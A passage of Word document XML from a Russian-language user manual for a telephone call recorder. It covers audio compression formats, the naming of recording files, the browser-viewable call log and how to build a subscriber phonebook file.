          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659776" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>987425</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>415925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1014730" cy="215900"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                <wp:wrapNone/>
                <wp:docPr id="17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DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                            <w:pPr>
                              <w:pStyle w:val="ad"/>
                              <w:spacing w:line="338" w:lineRule="exact"/>
                              <w:ind w:left="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Тип сжатия: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left:0;text-align:left;margin-left:77.75pt;margin-top:32.75pt;width:79.9pt;height:1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gxsgIAALM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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                      <w:pPr>
                        <w:pStyle w:val="ad"/>
                        <w:spacing w:line="338" w:lineRule="exact"/>
                        <w:ind w:left="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Тип сжатия:</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Устройство сохраняет на карте звуковые файлы записанных разговоров и Журнал звонков. </w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Каждый разговор в отдельный файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="002C1237" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1254"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660800" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>377190</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1270</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6802755" cy="208915"/>
                <wp:effectExtent l="0" t="2540" r="1905" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="17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755"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56E5F" id="Rectangle 40" o:spid="_x0000_s1026" style="position:absolute;margin-left:29.7pt;margin-top:.1pt;width:535.65pt;height:16.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tsfAIAAP4E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" stroked="f">
                <w10:wrap anchorx="page"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00433A6D">
        <w:t>16-bit PCM (1 час непрерывной записи занимает 55</w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00433A6D">
        <w:t>Мб);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1254"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>G.711 A-law (1 час непрерывной записи занимает 27</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>Мб);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1258"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve">IMA </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>ADPCM (1 час непрерывной записи занимает 14</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>Мб).</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Для каждого дня создается отдельная папка с датой и названием дня недели (например, 2013.03.01 Пт). Имя файла ГГГГ.ММ.ДД_ЧЧ_ММ_СС.</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wav</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, где</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="41"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ЧЧ,</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ММ,</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>СС</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="41"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>часы,</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>минуты</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>секунды</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="41"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>начала</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="41"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>разговора,</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ГГГГ,</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="38"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ММ,</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="42"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ДД</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="8172"/>
          <w:tab w:val="left" w:pos="9254"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t xml:space="preserve">год, месяц, день начала разговора, Например, расположение файла, записанного       1       марта       2013г.     </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t xml:space="preserve">в     </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>00:00:11</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve">«2013.03.01 </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>Пт\</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>2013.03.01_00_00_11.wav»</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Журнал звонков (</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>) можно просмотреть при помощи любого интернет -браузера. Он хранит в таблице информацию о всех записанных разговорах: время начала разговора, его продолжительность, входящий или исходящий телефонный номер, ссылку на файл с записью  разговора,  а  также имя абонента из Справочника абонентов. Также есть возможность сортировки данных по</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>столбцам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00EC7BBF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_TOC_250006"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Создание справочника</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:spacing w:val="4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>абонентов</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 xml:space="preserve">Для отображения имени абонента в  Журнале  звонков  необходимо создать Справочник абонентов (файл </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>phonebook</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>) с помощью любого текстового</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="26"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>редактора</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>записать</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>туда</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="24"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>номера</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>имя</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="24"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>абонента</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="24"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>через</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>символ</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w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tab</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>»; каждая запись с новой строки, например: 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xxxxxxxxxx</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tab</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> »имя абонента« </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>» 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xxxxxxxxxx</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tab</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> »имя абонента« </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>»</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После этого в колонке «Имя» будет отображаться имя из Справочника абонентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="009576B9" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_TOC_250005"/>
      <w:r w:rsidRPr="009576B9">
        <w:t>Поиск и устранение</w:t>
      </w:r>
      <w:r w:rsidRPr="009576B9">
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidRPr="009576B9">
        <w:t>неисправностей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
